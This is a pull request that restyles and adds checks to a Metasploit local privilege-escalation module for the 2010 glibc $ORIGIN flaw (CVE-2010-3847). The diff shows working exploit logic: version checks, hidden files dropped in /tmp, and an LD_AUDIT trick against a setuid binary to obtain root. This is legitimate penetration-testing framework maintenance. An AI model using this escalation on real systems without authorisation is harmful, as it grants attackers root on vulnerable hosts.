### PR TITLE
Code cleanup and update style

### DIFF
--- a/modules/exploits/linux/local/glibc_origin_expansion_priv_esc.rb
+++ b/modules/exploits/linux/local/glibc_origin_expansion_priv_esc.rb
@@ -10,6 +10,9 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
   include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Kernel
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
   include Msf::Exploit::Local::Linux
@@ -49,31 +52,30 @@ class MetasploitModule < Msf::Exploit::Local
         ],
       'DisclosureDate' => 'Oct 18 2010',
       'Platform'       => 'linux',
-      'Arch'           => [ ARCH_X86, ARCH_X64 ],
-      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'SessionTypes'   => ['shell', 'meterpreter'],
       'Targets'        =>
         [
-          [ 'Automatic', { } ],
-          [ 'Linux x86', { 'Arch' => ARCH_X86 } ],
-          [ 'Linux x64', { 'Arch' => ARCH_X64 } ]
+          ['Automatic', {}],
+          ['Linux x86', { 'Arch' => ARCH_X86 }],
+          ['Linux x64', { 'Arch' => ARCH_X64 }]
         ],
-      'DefaultTarget'  => 0,
       'References'     =>
         [
-          [ 'CVE', '2010-3847' ],
-          [ 'BID', '44154' ],
-          [ 'EDB', '15274' ],
-          [ 'URL', 'https://seclists.org/fulldisclosure/2010/Oct/257' ],
-          [ 'URL', 'https://www.ubuntu.com/usn/usn-1009-1' ],
-          [ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847' ],
-          [ 'URL', 'https://access.redhat.com/security/cve/CVE-2010-3847' ]
-        ]
-    ))
+          ['CVE', '2010-3847'],
+          ['BID', '44154'],
+          ['EDB', '15274'],
+          ['URL', 'https://seclists.org/fulldisclosure/2010/Oct/257'],
+          ['URL', 'https://www.ubuntu.com/usn/usn-1009-1'],
+          ['URL', 'https://security-tracker.debian.org/tracker/CVE-2010-3847'],
+          ['URL', 'https://access.redhat.com/security/cve/CVE-2010-3847']
+        ],
+      'DefaultTarget'  => 0))
     register_options [
-      OptString.new('SUID_EXECUTABLE', [ true, 'Path to a suid executable', '/bin/ping' ])
+      OptString.new('SUID_EXECUTABLE', [true, 'Path to a suid executable', '/bin/ping'])
     ]
     register_advanced_options [
-      OptString.new('WritableDir',     [ true, 'A directory where we can write files', '/tmp' ])
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
     ]
   end
 
@@ -86,17 +88,18 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def check
-    glibc_banner = cmd_exec 'ldd --version'
-    glibc_version = Gem::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
-    if glibc_version.eql? ''
+    v = Gem::Version.new glibc_version
+    if v.eql? ''
       vprint_error 'Could not determine the GNU C library version'
       return CheckCode::Safe
-    elsif glibc_version >= Gem::Version.new('2.12.2') ||
-          (glibc_version >= Gem::Version.new('2.11.3') && glibc_version < Gem::Version.new('2.12'))
-      vprint_error "GNU C Library version #{glibc_version} is not vulnerable"
+    end
+
+    if v >= Gem::Version.new('2.12.2') ||
+       (v >= Gem::Version.new('2.11.3') && v < Gem::Version.new('2.12'))
+      vprint_error "GNU C Library version #{v} is not vulnerable"
       return CheckCode::Safe
     end
-    vprint_good "GNU C Library version #{glibc_version} is vulnerable"
+    vprint_good "GNU C Library version #{v} appears vulnerable"
 
     unless setuid? suid_exe_path
       vprint_error "#{suid_exe_path} is not setuid"
@@ -113,12 +116,16 @@ class MetasploitModule < Msf::Exploit::Local
     CheckCode::Appears
   end
 
-  def upload_and_chmodx(path, data)
+  def upload(path, data)
     print_status "Writing '#{path}' (#{data.size} bytes) ..."
     rm_f path
     write_file path, data
-    cmd_exec "chmod +x '#{path}'"
     register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
   end
 
   def exploit
@@ -132,6 +139,14 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with Failure::NotVulnerable, 'Target is not vulnerable'
     end
 
+    if is_root?
+      fail_with Failure::BadConfig, 'Session already has root privileges'
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
     suid_partition = cmd_exec "df -P -- '#{suid_exe_path}' | awk 'NR==2 {print $1}'"
     base_partition = cmd_exec "df -P -- '#{base_dir}' | awk 'NR==2 {print $1}'"
     if suid_partition == base_partition
@@ -140,11 +155,11 @@ class MetasploitModule < Msf::Exploit::Local
       print_warning "'#{suid_exe_path}' and '#{base_dir}' are not located on the same partition"
     end
 
-    payload_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    payload_name = ".#{rand_text_alphanumeric 5..10}"
     payload_path = "#{base_dir}/#{payload_name}"
 
     # Set target
-    uname = cmd_exec 'uname -m'
+    uname = kernel_hardware
     vprint_status "System architecture is #{uname}"
     if target.name.eql? 'Automatic'
       case uname
@@ -195,12 +210,12 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     # Upload shared object
-    so_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    so_name = ".#{rand_text_alphanumeric 5..10}"
     so_path = "#{base_dir}/#{so_name}"
     upload_and_chmodx so_path, so
 
     # Upload exploit
-    link_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    link_name = ".#{rand_text_alphanumeric 5..10}"
     link_path = "#{base_dir}/#{link_name}"
     fd = rand(10..200)
     exp = %(
@@ -215,7 +230,7 @@ class MetasploitModule < Msf::Exploit::Local
       LD_AUDIT="\\$ORIGIN" exec /proc/self/fd/#{fd}
     )
 
-    exp_name = ".#{rand_text_alphanumeric rand(5..10)}"
+    exp_name = ".#{rand_text_alphanumeric 5..10}"
     exp_path = "#{base_dir}/#{exp_name}"
     upload_and_chmodx exp_path, exp
     register_file_for_cleanup link_path


### PR DESCRIPTION
Some cleanup for an old module, to bring it more inline with current style / practices.

In particular, updating the module to use newly implemented Post libs, add standard some error checking code patterns, and some minor style updates to make rubocop happier.

* check if `WriteableDir` is writable
* check `is_root?`
* use ranges in `rand_text_*` methods
* use post lib methods:
  * `glibc_version`
  * `chmod`
  * `kernel_hardware`

Tested on Fedora 13 i386.
